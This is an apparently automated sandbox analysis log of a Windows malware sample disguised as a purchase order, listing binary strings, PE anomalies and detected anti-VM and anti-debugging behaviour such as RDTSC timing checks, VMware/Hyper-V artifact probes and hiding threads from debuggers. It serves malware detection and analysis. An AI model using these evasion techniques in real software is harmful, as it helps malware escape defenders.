          Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
          Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000D.00000003.671537664.0000000000C57000.00000004.00000001.sdmp
          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
          Source: Binary string: System.Core.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: powrprof.pdbT source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: System.Xml.pdb? source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
          Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
          Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbJ source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
          Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
          Source: Binary string: C:\Users\user\Desktop\PO45937008ADENGY.PDB source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
          Source: Binary string: wlanext.pdbGCTL source: PO45937008ADENGY.exe, 00000009.00000002.716498017.0000000002F80000.00000040.00000001.sdmp
          Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
          Source: Binary string: edputil.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
          Source: PO45937008ADENGY.exe Static PE information: 0xEDF52E0E [Wed Jul 4 19:25:02 2096 UTC]
          Source: PO45937008ADENGY.exe Static PE information: real checksum: 0x16e14 should be: 0x29ee9
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 0_2_015BF138 pushad ; retf
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0041620A pushad ; iretd
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_004152CC push ds; retf
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_004154BD push fs; iretd
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_00415569 push edx; ret
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_004155C6 push edx; ret
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0137D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0397D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE52CC push ds; retf
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE620A pushad ; iretd
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EEB3B5 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE54BD push fs; iretd
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EEB46C push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EEB40B push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EEB402 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE55C6 push edx; ret
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE5569 push edx; ret
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exe RDTSC instruction interceptor: First address: 0000000002ED85E4 second address: 0000000002ED85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exe RDTSC instruction interceptor: First address: 0000000002ED897E second address: 0000000002ED8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_004088B0 rdtsc
          Source: C:\Windows\explorer.exe TID: 6572 Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 6996 Thread sleep time: -44000s >= -30000s
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exe Last function: Thread delayed
          Source: explorer.exe, 0000000C.00000000.694685314.000000000A64D000.00000004.00000001.sdmp Binary or memory string: _VMware_SATA_CD00#5&~
          Source: PO45937008ADENGY.exe, 00000000.00000002.723466381.00000000052D0000.00000002.00000001.sdmp, explorer.exe, 0000000C.00000002.926030547.00000000058C0000.00000002.00000001.sdmp, WerFault.exe, 0000000D.00000002.708139307.0000000004D70000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 0000000C.00000000.694504401.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000C.00000000.688629352.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: WerFault.exe, 0000000D.00000002.708068526.0000000004C20000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWT
          Source: WerFault.exe, 0000000D.00000002.706779671.00000000011C8000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 0000000C.00000000.678387989.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: PO45937008ADENGY.exe, 00000000.00000002.723466381.00000000052D0000.00000002.00000001.sdmp, explorer.exe, 0000000C.00000002.926030547.00000000058C0000.00000002.00000001.sdmp, WerFault.exe, 0000000D.00000002.708139307.0000000004D70000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 0000000C.00000000.695029841.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: PO45937008ADENGY.exe, 00000000.00000002.723466381.00000000052D0000.00000002.00000001.sdmp, explorer.exe, 0000000C.00000002.926030547.00000000058C0000.00000002.00000001.sdmp, WerFault.exe, 0000000D.00000002.708139307.0000000004D70000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 0000000C.00000000.695297313.000000000A784000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: PO45937008ADENGY.exe, 00000000.00000002.723466381.00000000052D0000.00000002.00000001.sdmp, explorer.exe, 0000000C.00000002.926030547.00000000058C0000.00000002.00000001.sdmp, WerFault.exe, 0000000D.00000002.708139307.0000000004D70000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information queried: ProcessInformation

          Anti Debugging:

          Hides threads from debuggers
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\wlanext.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01344120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01344120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01329100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0134B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01352990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0134C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013B41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01340050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013690AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01329080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013258EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013BB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01353B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01354BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01352397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01331B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013DD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0134DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01364A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01325210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01325210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01343A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01338A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0136927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013EEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013B4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01329240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01352AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01352ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0132AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01333D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013EE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013AA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01354D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01354D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01354D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0134C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0134C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01347D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01363D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01351DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01351DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01351DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013535A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01352581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01352581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01352581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01352581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01322D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01322D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01322D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01322D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_01322D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013D8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0133D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0133D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0134746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013BC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013BC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0135A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_0133849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO45937008ADENGY.exeCode function: 9_2_013E14FB mov eax, dword ptr fs:[00000030h]
